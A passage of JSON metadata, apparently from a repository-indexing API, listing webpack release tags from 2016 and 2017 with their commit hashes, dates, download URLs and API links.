ependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fw